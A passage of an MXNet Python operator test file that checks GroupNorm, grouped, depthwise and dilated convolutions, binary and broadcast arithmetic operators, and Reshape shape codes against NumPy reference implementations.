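        # (C/G, H, W) group with its own mean and std.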
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
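        # Reference GroupNorm backward pass: beta_grad and gamma_grad reduce the output gradient
        # over (N, H, W); data_grad follows the usual normalization backward within each group.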
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
        # Generate random data with ndim between 1 and 5 and every shape dim between 1 and 5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
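            # Reduce the broadcast gradient back to `shape` by summing over every axis
            # where the input had size 1 (i.e. the axes that were broadcast).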
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
    impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at the center of the output
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
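# The shape arguments below use Reshape's special codes: 0 keeps the corresponding input dim,
# -1 infers the dim from the remaining elements, -2 copies all remaining input dims,
# -3 merges two consecutive dims, and -4 splits a dim into the two values that follow;
# reverse=True applies the codes starting from the right.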
@with_seed()
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
